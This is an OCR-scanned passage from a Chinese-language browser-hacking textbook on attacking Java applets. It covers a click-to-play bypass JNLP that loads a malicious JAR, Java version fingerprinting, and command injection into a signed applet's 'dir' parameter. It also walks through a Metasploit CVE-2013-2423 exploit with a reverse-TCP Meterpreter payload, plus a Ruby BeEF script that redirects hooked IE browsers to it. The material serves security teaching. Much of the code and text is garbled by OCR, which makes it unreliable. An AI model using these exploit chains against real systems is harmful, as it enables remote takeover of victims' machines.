«jnlp spec="1.0" xmlns:jfx-http://javafx.com 
href-"applet security bypass.jnlp"'» 
«information» 
<title>Applet Test JNLP</title> 
<vendor>Oracle</vendor> 
<description>Esteban CtP bypass</description> 
<offline-allowed/> 
</information> 











<resources> 
<j2se version="1.7" 
href="http://java.sun.com/products/autodl/j2se" /> 
<jar href="malicious.jar" main="true" /> 
</resources> 
<applet-desc 
name="Malicious Applet" 
main-class="Main" 
width="1" 
height="1"> 
<param name="__applet_ssv_validated" value="true"></param> 
</applet-desc> 
«update check="background"/> 
</jnlp> 


TERR, A DUE, CA VRRP IE SE ET HE 


<param name="__applet_ssv_validated" value="true"></param> 





302 第 8 章 攻击 插件 








最 后 一 步 是 在 Web 服 务 器 上 保存 好 这 个 JNLP 文 件 , 然后 在 网 页 中 需要 触发 小 程序 执行 的 地 方 
引用 它 ， 相 关 代码 类 似 如 下 所 示 : 


<object codebase="http://java.sun.com/update/ \ 
1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0" 
classid="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" 
height="0" width="0"> 
<param name="app" value="__JNLP_URI__"> 
<param name="back" value="true"> 
<applet archive="malicious.jar" 
code="Main.class" 
width="1" height="1"> 
</applet> 
</object> 


虽然 以 上 漏洞 已 经 被 Oracle 修 复 了 ,但 通过 它们 可 以 对 浏览 器 中 的 “ 猫 捉 老鼠 ”游戏 有 个 大 
概 的 认识 。 浏 览 侨 和 插件 开发 者 不 断 开 发 出 新 的 特性 ， 而 攻击 者 不 断 找到 漏洞 实施 攻击 ,然后 这 
些 漏洞 又 被 修复 。 从 作者 写作 本 书 起 ，Java 标 准 版 6 至 少 已 经 打 过 6 次 补丁 ， 处 理 了 大 约 一 百 项 安 
全 问题 ”。 



































8.3.2 ”攻击 Java 


这 个 世界 与 Java 存 在 着 微妙 的 关系 。 从 在 线 会 议 到 流行 游戏 ， 背 后 都 可 能 看 到 Java 的 身影 。 
正如 第 4 章 讨 论 过 的 ， 虽 然 Java 为 Web 提 供 了 调用 应 用 的 能 力 ， 但 它 也 有 一 段 不 安全 的 历史 ”。 很 
多 安全 专家 都 建议 完全 禁用 Java， 可 是 并 不 是 所 有 情况 都 能 做 到 。 比 如 ， 某 些 在 线 银行 的 门户 就 
依赖 Java'*。 

可 以 通过 两 种 主要 的 方式 来 运行 Java 代 码 : 通过 独立 的 Java 应 用 程序 , 或 者 通过 Web 小 程序 。 
本 小 节 关 注 Java 小 程序 的 工作 过 程 ， 如 何 操纵 小 程序 ， 以 及 利用 小 程序 实现 对 系统 的 远程 控制 。 

1. 理解 Java 小 程序 

在 学 习 如 何 操 作 Java 之 前 ， 理 解 什么 是 Java 小 程序 ， 它 们 如 何 与 浏览 器 交互 ， 以 及 一 些 核心 
功能 上 的 区 别 是 很 重要 的 。 小 程序 是 特定 为 在 网 页 中 运行 Java 代 码 而 设计 的 。Java 有 一 个 针对 小 
程序 的 安全 模型 ， 以 防止 小 程序 调用 恶意 代码 。 这 个 模型 也 叫 作 沙 箱 ， 包 含 了 不 少 安全 限制 '。 

在 沙 箱 里 ， 默 认 会 屏蔽 代码 访问 文件 系统 以 及 执行 操作 系统 命令 。 这 个 Java 安 全 模型 要 求 访 
间 涉 及 安全 的 一 些 功能 之 前 ， 必 须 确认 代码 是 可 信 的 ,或 者 必须 得 到 用 户 的 授权 。 关 于 Java 的 很 
多 安全 人 研究， 都 涉及 绕 过 其 安全 测量 机 制 。 换 名 话说 ,就 是 想 办 法 从 沙 箱 中 突围 出 来 ， 获 得 对 底 
层 文件 系统 的 访问 权限 ， 以 及 执行 附加 代码 ， 其 至 从 浏览 器 中 突围 出 来 。 

从 Java 代 码 及 其 编码 后 生成 的 class 文 件 之 间 的 关系 出 发 ， 可 以 更 好 地 理解 Java 代 码 。Java 代 
码 经 编译 生成 字 节 码 ， 然 后 字 节 码 由 JVM (Java Virtual Machine，Java 虚 拟 机 ) 处 理 。JVM 处 理 
字 节 码 之 后 会 执行 它 。 应 用 也 可 以 把 字 节 码 转换 回 其 代表 的 Java 代 码 ， 完 成 这 个 过 程 的 应 用 通常 
叫 反 编译 器 ， 本 章 后 面 会 谈 到 。 

小 程序 能 够 干什么 取决 于 它 的 权限 ,总 的 来 说 ,权限 规定 了 小 程序 通过 沙 箱 如 何 与 系统 交互 。 
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签名 小 程序 与 未 签名 小 程序 的 核心 区 别 之 一 ， 就 是 签名 小 程序 可 以 在 沙 箱 外 部 执行 代码 。 

对 于 签名 的 小 程序 ，Java 会 验证 签名 是 否 有 效 ， 如 果 签 名 是 未 知 的 ， 则 提醒 用 户 确认 接受 该 
小 程序 。 第 5 章 介绍 过 利用 签名 的 Java 小 程序 实施 攻击 。 

另 一 方面 , 未 签名 小 程序 会 被 隔离 在 沙 箱 内 部 。 从 利用 角度 看 ， 这 样 并 不 理想 ,但 对 保障 用 
PREMA, 却 是 非常 有 效 的 。 为 了 让 未 签名 小 程序 能 够 执行 任意 操作 系统 或 网 络 级 操作 ， 首 先 
必须 摆脱 沙 箱 。 为 此 , 大 多 数 利 用 未 签名 小 程序 来 获得 额外 特权 的 攻击 ， 都 涉及 绕 过 沙 箱 。 绕 过 
沙 箱 之 后 ， 就 可 以 在 沙 箱 之 外 执行 代码 。 

我 们 时 不 时 就 会 看 到 关于 越狱 的 讨论 , 而 且 相 关 漏 洞 的 修复 优先 级 也 是 最 高 的 。 之 所 以 如 此 ， 
是 因为 越狱 会 极 大 地 破坏 安全 模型 ,由 此 造成 的 损失 也 会 最 大 ,鉴于 类 似 的 漏洞 都 是 动态 变化 的 ， 
我 们 不 会 具体 讨论 越狱 ， 而 只 会 讨论 针对 特定 Java 版 本 的 攻击 。 

2. 检测 Java 

在 进行 任何 Java 攻 击 之 前 ， 可 以 考虑 确定 一 下 Java 是 否 在 运行 。 令 人 惊讶 的 是 ， 要 在 现代 浏 
览 器 中 检测 Java 是 否 运 行 却 不 容易 。 最 靠 谱 的 采集 浏览 器 指纹 、 检 测 Java 是 否 存 在 的 方法 ， 就 是 
证 用 户 帮 你 运行 一 个 Java 小 程序 ， 然 后 这 个 小 程序 会 执行 查询 ， 最 后 把 结果 返回 给 你 。 

小 程序 运行 后 ，Java 可 以 在 小 程序 内 部 读 取 到 版 本 字符 串 。 未 签名 小 程序 也 有 足够 权限 执行 
这 个 操作 。 我 们 目标 是 让 用 户 运 行 一 个 小 程序 ， 取得 结果 ,然后 把 结果 发 回 给 你 ， 以 便 进一步 定 
位 目标 。 从 Java 1.7ul1 这 个 版 本 起 ， 用 户 必须 明确 允许 执行 未 签名 的 小 程序 才 行 。 

以 下 代码 使 用 了 System.getProperty 方 法 , 来 取得 Java 版 本 及 厂商 。 这 个 调用 在 execute 
函数 中 ， 并 返回 一 个 字符 串 : 

import java.applet.*; 

import java.awt.*; 


public class JVersion extends Applet{ 
public JVersion() ( 


























































































































super(); 
return; 
j 
public static String execute() ( EE 
return (" Java Version: " + 





System.getProperty("java.version")-« 
" by "«System.getProperty ("java.vendor")); 
j 
} 


以 下 HTML 和 JavaScript 代 码 会 执行 前 面 的 Java 代 码 ， 然 后 在 页 面 中 创建 一 个 对 象 ， 再 使 用 
JavaScript 调 用 该 对 象 的 execute 方 法 。 以 下 是 使 用 aocument .wirte 方 法 把 结果 输出 到 屏幕 上 的 
代码 : 


<object id='JVersion' name='JVersion'> 
<param name='code' value='JVersion.class' /> 
<param name='codebase' value='null' /> 























<param name='archive' 
value='http://browserhacker.com/JVersion.jar' /> 
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</object> 





<script> 
document .write (document .JVersion.execute()); 
</script> 
如 果 这 段 代码 执行 时 浏览 器 运行 的 是 Java 1.7， 就 会 弹出 如 图 8-10 所 示 的 警告 对 话 框 。 


eoo Security Warning 





Do you want to run this application? 


An unsigned application from the location below is requesting 
4 ! permission to run. 
Location: http:/ /browserhacker.com:3000/ 


Running unsigned applications like this will be blocked in a future release 


because it is potentially unsafe and a security risk. 
More Information 


Select the box below, then click run to start the application 
DD L accept the risk and want to run this app. 


em 





图 8-10 在 Java 1.7ul1 以 上 版 本 中 运行 未 签名 小 程序 之 后 看 到 的 对 话 框 


点 击 图 中 的 对 话 框 之 后 , 会 出 现 图 8-11 所 示 的 内 容 。 不 过 ,在 Java 1.6 及 更 早 版 本 中 ,这 个 未 
签名 小 程序 是 可 以 不 经 用 户 交 互 而 自动 运行 的 。 


HH 








we Favorites | 535 Æ] Web Slice Gallery v 


(Æ hitp://browserhacker.com/JVersion.html 


Java Version: 1.7.0_40 by Oracle Corporation 





图 8-11 JVersion 小 程序 的 输出 结果 


不 管 这 些 检测 方法 怎么 样 ， 对 Java 1.7u11 之 后 的 版 本 ， 执 行 恶 意 Java 小 程序 的 最 好 方式 ， 就 
是 不 要 提前 检测 Java 版 本 而 直接 运行 。 这 是 因为 浏览 器 在 运行 小 程序 之 前 总 会 向 用 户 请 求 权 限 ， 
无 论 这 个 小 程序 是 检测 Java 代 码 的 ， 还 是 一 个 未 签名 的 恶意 小 程序 。 

3. 破解 Java 小 程序 

拿 到 一 个 可 信 的 Java 小 程序 时 ， 我 们 希望 能 破解 它 的 代码 ， 理 解 其 内 部 工作 机 制 ， 然 后 尝试 
从 中 找到 可 能 的 漏洞 。 可 问题 在 于 ， 你 不 能 直接 修改 代码 本 身 。 如 果 小 程序 从 页 面 中 接收 参数 ， 
则 可 能 发 现 小 程序 存在 哪些 缺陷 可 以 利用 。 此 时 , 就 是 通过 利用 一 个 可 信任 的 小 程序 的 漏洞 来 攻 
击 一 台 主 机 。 

要 发 现 缺陷 ， 必 须 能 看 到 小 程序 的 内 部 代码 。 为 此 ， 首 先 必 须 找 一 个 Java 反 编译 器 ， 比 如 
JD-GUI。 这 个 反 编 译 器 接收 Java 字 节 码 ， 然 后 将 其 转换 为 我 们 可 以 看 懂 的 代码 。 使 用 JD-GUI 应 
用 于 ， 可 以 拆 解 Java 小 程序 ， 从 而 发 现 缺 陷 ， 然 后 决定 如 何 修改 网 页 来 利用 该 缺陷 。 偶 尔 ， 可 能 
也 会 遇 到 被 模糊 处 理 过 的 Java 小 程序 代码 ， 这 种 情况 下 ， 往 往 需要 再 花 点 时 间 进 行 反 模糊 。 
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为 了 演示 ,下 面 的 例子 展示 了 如 何 破解 一 个 设计 好 的 Java 小 程序 ， 通过 它 又 可 以 进一步 底层 
控制 浏览 需 和 操作 系统 。 这 里 ,我 们 的 目标 是 利用 常规 小 程序 的 行为 ， 以 达到 执行 任意 操作 系统 
命令 的 目的 。 
通过 分 析 HTML 和 JavaScript, 可 以 了 解 直接 传 给 小 程序 的 参数 有 哪些 。 而 这 个 小 程序 还 对 外 
暴露 了 execute () 方 法 : 














<object id='signedAppletCmdExec' 
classid-'clsid:8AD9C840-044E-11D1-B3E9-00805F499Dp93' 
name-'signedAppletCmdExec'-» 
«param name-'code' value-'signedAppletCmdExec.class' /> 
«param name-'codebase' value-'null' /> 
«param name-'archive' 
value-'http://browserhacker.com/signedAppletCmdExec.jar' /» 
«param name-'debug' value='true' /> 
«param name-'dir' value='c:/' /> 

«/object» 


这 段 代码 告诉 浏览 器 执行 signedAppletCmdExec.jar 文 件 中 的 signedAppletCmdExec 类 。 这 

类 会 把 debug 参 数 设 置 为 Lrue， 把 Gir 的 值 设置 为 c: /。 浏览 器 运行 这 段 代 码 时 ， 参 数 会 被 传 

Ma 而 小 程序 就 会 接收 到 aebug 和 qdir 值 , 为 了 最 终 运 行 小 程序 , 同时 也 需要 以 下 JavaScript 
代码 : 


























<script> 

try { 
output = document .signedAppletCmdExec.execute(); 
console.log("output: " + output); 
return; 


jcatch (e) { 
console.log("timeout"); 
return; 
} 


</script> 
这 段 JavaScript 代 码 创建 一 个 访问 小 程序 的 函数 , 并 在 小 程序 内 部 运行 sxecute 方 法 。 它 也 会 
把 来 自 小 程序 的 输出 写 到 浏览 器 控制 人 台 。 代 码 运 行 后 ， 可 以 看 到 如 图 8-12 所 示 的 结 


























{Æ Signed Applet Cmd Exec A- By Cl dA v Pagev Safety~ Tod 











Efi Administrator: C:\Windows\system32\cmd.exe o 8) X 


DIN) 























图 8-12 ”cmd.exe 窗 口 展 示 了 < 六 提示 符 
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了 解 了 代码 的 执行 过 程 ， 很 明显 可 以 知道 ,有 可 能 利用 这 个 机 会 执行 任意 操作 系统 命令 。 为 
了 知道 到 底 应 该 怎么 做 到 ， 需 要 知道 该 代码 在 Java 内 部 是 怎么 被 调用 的 。 这 时 候 就 需要 破解 Java 
代码 ， 调 查 一 下 它 是 怎么 调用 cmd.exe 的 。 

首先 ， 需 要 从 .jar 文件 中 提取 出 ,class 文件 。 下 载 .jar 文 件 ， 将 其 保存 到 一 个 临时 目录 中 。 为 了 
从 .jar 文 件 中 提取 内 容 , 输入 下 面 列 出 的 命令 。 记 住 ，jar 文 件 不 过 就 是 一 个 .zip 文 件 ， 其 中 包含 了 
所 有 必需 的 Java 类 文件 及 相关 内 容 : 


$ jar xvf signedAppletCmdExec.jar 
inflated: META-INF/MANIFEST.MF 
inflated: META-INF/MYKEY.SF 

inflated: META-INF/MYKEY.DSA 

created: META-INF/ 

inflated: signedAppletCmdExec.class 
inflated: RelaxedSecurityManager.class 


我 们 注意 到 ， 有 两 个 类 文件 被 提取 出 来 ， 还 有 相应 的 META-INF 信 息 ， 表 明了 这 个 小 程序 的 
签名 情况 。 这 两 个 类 文件 包含 着 编译 为 字 节 码 的 小 程序 的 代码 。 接 下 来 ， 运 行 JD-GUI 应 用 ， 并 
双击 signedAppletCmdExec.class。 加 载 之 后 ， 应 该 看 到 类 似 图 8-13 所 示 的 结果 。 








eee Java Decompiler - signedAppletCmdExec.class 

Sy 

bo = 
Hi .Users.crzycoder RelaxedSecurityManager.class signedAppletCmdExec.class 四 * 


v [D RelaxedSecurityManager 
了 © RelaxedSecurityManager 





dir = getParameter(" dir"); 


} 


@ checkPermission(Permission) : void 





¥ [J] signedAppletCmdExec public signedAppletCmdExec() 
* © signedAppletCmdExec 1 
95 debug : String | 18 RelaxedSecurityManager localRelaxedSecurityManager = new RelaxedS 
65 dir : String | 19 System. setSecurityManager(localRelaxedSecurityManager); 
} 
9 init0 : void 


public static String execute) 
t 
String strl = ""; 
try { 
String str2 = "cmd /c start cmd.exe /K \"cd " + dir + "\""; 
Process localProcess = Runtime. getRuntime().exec(str2); 


9 signedAppletCmdExec0. 1 


OutputStream localüutputStream = LocalProcess.getOutputStream() 
InputStream locallnputStream = localProcess.getInputStream(); 
DataInputStream localDataInputStream = new DataInputStream(loca 

33 String str3 = localDataInputStream.readLine(); 
| 34 while (str3 != null) { 























图 8-13 ”JD-GUI 显 示 了 提取 出 来 的 源 代码 


这 段 代 码 中 有 两 个 部 分 需要 重点 说 明 。 第 一 部 分 是 这 个 小 程序 覆盖 了 默认 的 Security 
Manager， 放 松 了 执行 命令 所 需 的 权限 。 如 果 不 明确 授权 这 个 小 程序 ， 或 者 像 本 例 这 样 授予 它 全 
部 权限 ， 小 程序 就 会 抛 出 一 个 安全 异常 ， 并 拒绝 执行 命令 。 第 二 部 分 是 str2 变 量 中 包含 着 要 使 
用 dir 参 数 执行 的 命令 ， 而 dir 参 数 是 从 外 部 传 入 代码 的 。 

以 上 信息 已 经 告诉 了 我 们 所 有 执行 操作 系统 命令 相关 的 信息 。 为 了 验证 , 我 们 可 以 再 输入 一 
个 命令 ， 让 cmd.exe 去 执行 。 因 为 最 初 的 命令 并 没有 输出 到 屏幕 ， 额 外 的 命令 也 是 看 不 到 的 。 我 
们 来 试 一 下 ， 把 最 初 的 HTML 代 码 修改 为 如 下 所 示 : 


<object id='signedAppletCmdExec' 
classid='clsid: 8AD9C840-044E-11D1-B3E9-00805F499D93' 
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name-'signedAppletCmdExec'-» 


«param 
«param 
«param 


value=' 


<param 


name='code' value='signedAppletCmdExec.class' /> 
name='codebase' value='null' /> 

name='archive' 

http: //browserhacker.com/signedAppletCmdExec.jar' /> 
name='debug' value-'true' /> 


<param name='dir' value='c:/ && notepad.exe' /> 
«object id-'signedAppletCmdExec' 


其 中 加 粗 的 那 行 代码 会 让 cmd.exe 在 被 Java 小 程序 执行 时 进入 c:/ 目 录 ， 然 后 启动 notepad.exe。 
为 验证 这 行 代码 有 效 ， 重 新 加 载 攻 击 页 面 ， 之 后 应 该 看 到 类 似 图 8-14 所 示 的 输出 。 其 中 cmd.exe 











的 标题 上 显示 着 用 户 正 在 执行 的 是 notepad.exe。 不 过 ， 在 执行 过 程 完成 得 相当 快 的 情况 下 ， 用 户 
不 太 可 能 注意 到 这 个 位 置 的 瞬间 变化 。 

这 确实 是 执行 Metasploit Meterpreterpayload 的 好 机 会 ， 可 以 快速 切换 到 其 他 进程 。 除 此 之 外 ， 
还 可 能 实现 添加 本 地 用 户 ， 或 者 被 授予 适当 权限 ， 甚 至 是 被 提升 为 域 管理 员 ， 如 果 你 的 目标 在 
Windows 域 中 有 提升 的 权限 的 话 。 


令 。 不 过 ， 有 时 候 我 们 可 能 会 遇 到 比 这 更 复杂 的 Java 小 程序 。 
无 论 你 的 目标 是 下 载 程序 、 安 装 程序 ,还 是 具有 类 似 功 能 的 其 他 小 程序 ,它们 几乎 总 是 被 用 








{Æ Signed Applet Cmd Exec 





画 notepad.exe 


File Edit Format View Help 














图 8-14 ”签名 的 小 程序 启动 了 cmd.exe 和 notepad.exe 


前 面 我 们 通过 一 个 设计 好 的 小 程序 , 演示 了 如 何 利用 有 漏洞 的 Java 小 程序 来 执行 操作 系统 命 





























户 所 信任 的 。 如 果 你 修改 受信 任 应 用 的 选项 , 并 把 修改 后 的 值 发 送 给 目标 会 怎么 样 呢 ?为 了 利用 
这 些 技术 ， 必 须 再 使 用 Java 反 编译 工具 ， 挖 掘 得 更 深 一 些 。 

4. 绕 过 Java 沙 箱 

时 不 时 就 有 人 发 现 Java 沙 箱 存在 漏洞 ,， 可 以 利用 它们 绕 过 沙 箱 , 在 沙 箱 外 部 执行 恶意 代码 1”。 
不 过 ， 并 不 是 所 有 Java 版 本 都 存在 漏洞 。 因 此 ， 问 题 的 关键 在 于 如 何 验证 特定 的 Java 版 本 ， 之 后 
才能 确定 是 否 存在 可 攻击 的 漏洞 。 如 果 不 知道 版 本 信息 ， 想 攻破 沙 箱 是 非常 困难 的 。 

本 章 前 面 介绍 的 采集 指纹 的 代码 ， 可 以 用 来 检测 正在 运行 的 Java 是 什么 版 本 。 取 得 这 个 信息 





Jes 























H 





























就 可 以 知道 该 版 本 是 否 存 在 可 以 绕 过 沙 箱 的 方法 。 因 为 Java 在 不 断 升 级 ， 所 以 在 书 中 给 出 利 








策略 ， 列 出 特定 的 漏洞 版 本 没什么 意义 。 上 网 搜索 一 下 你 查 到 的 版 本 ,， 才 是 找到 可 能 的 绕 行 方 
案 的 好 办 法 。 
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另外 ,我们 再 说 说 前 面 那 两 个 Java 代 码 的 例子 。 这 两 个 例子 都 允许 我 们 利用 签名 的 小 程序 ， 
在 JavaScript 和 小 程序 之 间 建 立 联系 。 在 不 加 以 利用 的 情况 下 , 这 是 在 小 程序 内 向 操作 系统 发 送 指 
令 的 唯一 方式 。 我 们 也 看 到 了 ， 这样 可 能 会 产生 提示 报警 ， 因 此 为 了 提高 攻击 有 效 性 ， 必 须 综合 
采用 社会 工程 学 或 辅 以 其 他 攻击 手段 。 

最 有 名 的 沙 箱 绕 行 方案 之 一 是 CVE-2013-0422, 目标 是 Java 1.7 的 u9 和 u10。 与 很 多 Java bug 
一 样 ， 这 个 漏洞 也 经 历 被 人 发 现 、 浮 出 水 面 、 被 分 析 ， 之 后 被 修复 的 过 程 。 反 模糊 代码 第 一 次 
公布 来 自 Security Obscurity”。 相 应 的 小 程序 代码 在 这 里 可 以 找到 : https://browserhacker.com。 

这 个 线 行 方案 利用 的 漏洞 依赖 于 Java Reflection API*'。 反 射 是 一 种 代码 在 运行 时 检测 和 修改 
对 象 行为 的 能 力 。 在 这 里 ， 通 过 使 用 反射 ， 可 以 获得 com.sun.jmx.mbeanserverMBeanIns- tantiator 
的 一 个 实例 ， 然 后 调用 findclass () 方 法 。 有 了 这 个 可 能 性 之 后 ， 就 可 以 加 载 额外 的 类 ， 在 实 
践 中 甚至 可 以 调用 你 定义 好 的 、 调 用 Runtime .getRuntime () .exec () 方 法 的 类 ， 从 而 执行 操 
作 系 统 命令 。 

由 于 这 样 绕 过 了 沙 箱 ， 因 此 利用 这 个 漏洞 可 以 在 未 签名 的 小 程序 中 执行 操作 系统 命令 。 当 
时 这 个 漏洞 的 影响 还 是 很 大 的 ,正如 前 面 说 过 的 ，Oracle 是 从 Java 1.7u11 开 始 才 添加 了 点 击 播放 
功能 。 

5. 利用 Java 

下 面 的 例子 针对 Java 1.7017 及 以 下 版 本 ， 利 用 Jeroen Frijters 发 现 的 CVE-2013-2423”。 这 里 用 
到 的 Metasploit 模 块 叫 java_jre17_driver manager. 

还 记得 本 章 前 面 讨论 过 的 Imnmunity 发 现 的 第 二 个 绕 过 点 击 播放 的 技术 吗 ? 在 此 , 我 们 会 展示 
它 的 一 个 实际 应 用 ， 看 看 怎么 绕 过 点 击 播放 ， 因 为 我 们 的 目标 是 晚 于 Java 1.7ul1 的 版 本 。 

首先 ， 需要 在 Metasploit 中 配置 一 下 : 


msf > use exploit/multi/browser/java_jrel7_driver manager 

msf exploit (java_jrel7_driver_manager) > set PAYLOAD 
java/meterpreter/reverse_tcp 

msf exploit (java_jrel7_driver_manager) > set SRVHOST 172.16.37.1 

msf exploit (java_jrel7_driver_manager) > set LHOST 172.16.37.1 

msf exploit (java_jrel7_driver_manager) > exploit 

*] Exploit running as background job. 




































































* 


Started reverse handler on 172.16.37.1:4444 
*] Using URL: http://172.16.37.1:8080/uGDMZKaKGvbP59 
Server started. 


其 中 的 反 向 处 理 程序 已 经 可 以 接受 连接 了 ，Web 服 务 器 也 提供 了 恶意 JAR 和 JNLP 文 件 ， 现在 
就 可 以 欺骗 受害 者 点 击 加 粗 的 URL。 把 它 记 住 ， 因 为 需要 在 以 下 Ruby 脚 本 中 替换 变量 EXPLOIT_ 
URL 的 值 : 


require 'rest client' 





* 




















require 'json' 


# REST API root3$,A 
ATTACK, DOMAIN = "172.16.37.1" 
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RESTAPI_HOOKS = "http://" + ATTACK_DOMAIN + ":3000/api/hooks" 
RESTAPI LOGS = "http://" + ATTACK DOMAIN + ":3000/api/logs" 
RESTAPI MODULES = "http://" + ATTACK DOMAIN + ":3000/api/modules" 
RESTAPI ADMIN = "http://" + ATTACK DOMAIN + ":3000/api/admin" 


# Metasploit exploit URL 


EXPLOIT URL = "http://172.16.37.1:8080/uGDMZKaKGvbP59" 
BEEF USER - "beef" 
BEEF PASSWD - "beef" 


Gtoken - nil 
@modules = nil 
@hooks = nil 


def print_banner 
puts "[>>>] JDK <= 1.7u17 pwner - with CtP bypass for IE]" 
end 


def auth 

response = RestClient.post "#{RESTAPI_ADMIN}/login", 

{ 'username' => "#{BEEF_USER}", 

‘password! => "#{BEEF_PASSWD}"}.to_json, 

:content type => :json, 

:accept => :json 

result = JSON.parse (response. body) 

@token = result['token'] 

puts "[+] Retrieved RESTful API token: #{@token}" 
end 


def get_hooks 
response = RestClient.get "#{RESTAPI_HOOKS}", 
{:params => {:token => @token}} 
result = JSON.parse (response. body) 
@hooks = result ["hooked-browsers"] ["online"] 
puts "[+] Retrieved Hooked Browsers list. Online: #{@hooks.size}" 
end 


def get_modules 
response = RestClient.get "#{RESTAPI_MODULES}", 
{:params => {:token => @token}} 
Gmodules = JSON.parse (response. body) 
puts "[+] Retrieved #{@modules.size} available command modules" 
end 


def get_module_id(mod_name) 
@modules.each do |mod| 





# 常 规 的 模块 
if mod name == mod[1]["class"] 
return mod[1]["id"] 
break 
end 
end 


end 





AE 


7 
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def pwn 
@windows_hooks 
@hooks.each do 
session 
browser = 


[] 

| hook | 

hook[1]["session"] 

"#{hook[1] ["name"]}-#{hook[1] 


if browser.match(/^IE/) 
Sleep 2 
mod, id get module id("Site redirect 
redirect to msf(session, mod id) 
puts "[+] Browser [#{browser}] 
"MSF exploit 
"Check your MSFconsole..." 


redirected to 
[multi/browser/java, jrel7 driver manager]. 


["version"])" 


sj 


$ 


because" + 


else 
puts "[+] Skipping browser [#{browser}] 
" the Click to Play bypass will not work." 
end 
end 
end 


def redirect to msf(session, mod id) 
RestClient.post 
token=#{@token}", 
("redirect url" 
:content type -» 
:accept -» :json 


:json, 
end 


print, banner 

# 取得 REST API token 
auth 

# 取得 在 线 匀 连 
get_hooks 

# 取得 可 用 的 
get_modules 
# 重 定向 


pwn 


以 上 Ruby 代 码 使 用 的 是 BeEF 的 REST API, 


We 


IL a 


器 


的 浏 


运行 这 














动向 特定 的 勾 连 浏览 需 发 送 指令 


"#{RESTAPI_MODULES}/#{session}/#{mod_id}?\ 


=> EXPLOIT_URL}.to_json, 


， 而 不 需要 





使 用 GUI。 段 脚本 后 ， 如 果 匀 连 的 是 IE， 


LON-SP-5DV7P:Ch08 morru$ ruby java 


运行 这 a UJ 


# 就 会 被 重 定 向 到 加 粗 的 那个 URL : 


1.7u17, Exploit rest.rb 








»] JDK «- 1.7u17 pwner - with CtP bypass 
Retrieved Hooked Browsers list. Online: 
Retrieved 435 available command modules 
Skipping browser [FF-24] 
bypass will not work. 
Browser [IE-10] 
multi/browser/java, jrel7. driver. manager] 





把 浏览 器 重 定 向 到 Metasploit 的 Web 服 务 器 UREL 后 ， 


for IE] 


Retrieved RESTful API token: 8a9ca8fab115a07677b736317c836842420c8131 


1 


because the Click to Play 


redirected to MSF exploit 
.Check your MSFconsole... 





会 得 到 JNLP 文 件 , 还 有 恶意 的 JAR。 接 下 
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来 就 看 Metasploit 的 了 。 它 会 帮 你 传输 和 执行 Java Meterpreter stage， 最 终 在 目标 机 器 上 执行 
的 Meterpreter payload : 


msf exploit (java_jrel7_driver_manager) > [*] 172.16.37.149 
java_jrel7_driver_manager - handling request for /uGDMZKaKGvbP59 
*] 172.16.37.149 java, jre17 driver manager - 

handling request for /uGDMZKaKGvbP59/ 

*] 172.16.37.149 java, jrel7 driver manager - 

handling request for /uGDMZKaKGvbP59 

*] 172.16.37.149 java, jre17 driver manager - 

handling request for /uGDMZKaKGvbP59/ 

*] 172.16.37.149 java, jre17 driver manager 
handling request for /uGDMZKaKGvbP59/CanPVnBL.jnlp 
*] 172.16.37.149 java, jrel7 driver manager - 
handling request for /uGDMZKaKGvbP59/maUmMQvf.jar 

*] Sending stage (30355 bytes) to 172.16.37.149 

*] Meterpreter session 1 opened (172.16.37.1:4444 -> 


172.16.37.149:64944) at 2013-09-30 13:08:54 «0100 

这 种 利用 技术 的 好 处 在 于 同时 使 用 了 之 前 讨论 的 点 击 播放 绕 行 方案 , 攻击 不 需要 用 户 交 互 就 

可 以 完成 。 图 8-15 展 示 了 相应 的 Java 控 制 台 ( 仅 为 调试 目的 打开 )。 选 中 的 那 一 行 展示 了 JNLP 描 
述 符 中 绕 过 了 点 击 播放 。 












































L3 GD GS http://17216.37.1:3000/demos/basic.htm! ~ BC) @ BeF Basic Demo 


You should be hooked into BeEF. 








ig [& Java Console 


<offine-allowed/> 
B | «information» 














«resources» 
: «j2se versione" 1.74" hrefe"http:/java.sun.com/products/autodl/j2se" /> 
* ha.ckers.org homepage «jar href-'maUmMQvf.jar" main «"true" /> 
* Slashdot </resources> E 
<applet-desc name ="RuUgkxeG” main-classe"UefvizF" widthe"i'heighte"it» | 
Have a go at the event logger. b let-desc» EZ = x xU 


Insert your secret here: «update check "background" 





</nip> 
You can also load up a more advance | temp: 


returning ROOT as follows: 

File Find Disable View Images Cache ps wernt xmins:jfx "http: //javafx.com™ href="http://172. 16.37. 1:8080/uGD 
«title» Applet Test JNLP</title> 

«vendor > frFLnjEv </vendor> 

<description>jkcFpBzn</description> 


« [39] 














http://172. 16.37, 1:3000/demos/basic.html — GB 


Jdhzbh=M7BYxOmaCnoRiOsePdExSdDG... GET 200 text/javascipt 2858 484ms XMLHttpRequest | 
jahzbh=M7BXxOmqCnORiDseiPdEx6dDiuG.,， GET 200 text/javasaript 2858 499ms XMLHttpRequest || 




















图 8-15 ”成 功 实施 CVE-2013-2423 利 用 


本 节 简 单 演示 了 ve 综合 | 可 以 一 块 配置 Java 利 用 和 CtP 绕 行 。 整 个 
过 程 还 可 以 更 简化 一 些 这 个 例子 的 结果 是 得 到 对 受害 者 计算 机 的 可 交互 、 操 作 系 统 级 的 
eU 











8.3.3 攻击 Flash 
与 Java 类 似 ,，Flash 也 是 非常 常见 的 一 款 浏览 器 插件 。Flash 是 用 于 创建 动画 、 交 互 应 用 及 适量 
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图 形 的 一 个 框架 。 另 外 ， 它 经 常 被 用 于 流 媒 体 播放 。 

Flash 维 护 着 自己 的 cookie ( 不 能 直接 从 浏览 器 中 删除 )。Flash 也 可 以 使 用 本 地 存储 缓存 文件 ， 
还 可 以 访问 摄像 头 和 麦克 风 。Flash 也 具备 与 远程 目标 通信 的 能 

理解 Flash 是 什么 ， 如 何 采集 其 指纹 以 及 利用 它 ， 是 攻击 插件 的 必 备 技术 。Flash 的 无 处 不 在 
以 及 可 以 通过 它 利 用 麦克 风 和 摄像 头 的 能 力 ， 使 其 成 为 非常 有 价值 的 攻击 目标 。 

如 前 所 述 ，Flash 在 交互 式 网 页 游戏 中 应 用 得 十 分 广泛 。Facebook 风 靡 一 时 的 《开心 农场 》 就 
是 用 Flash 开 发 的 。 虽 然 很 多 网 页 游戏 都 使 用 Flash 开 发 ， 但 由 于 苹果 在 iPhone 上 不 支持 Flash， 开 
发 人 员 开 始 使 用 其 他 跨 平台 技术 来 开发 这 种 交互 式 应 用 和 游戏 。 

1. 理解 共享 对 象 

共享 对 象 ( shared object ) 是 ActionScript 中 的 一 个 概念 ， 支 持 从 数据 存储 中 本 地 或 远程 检索 
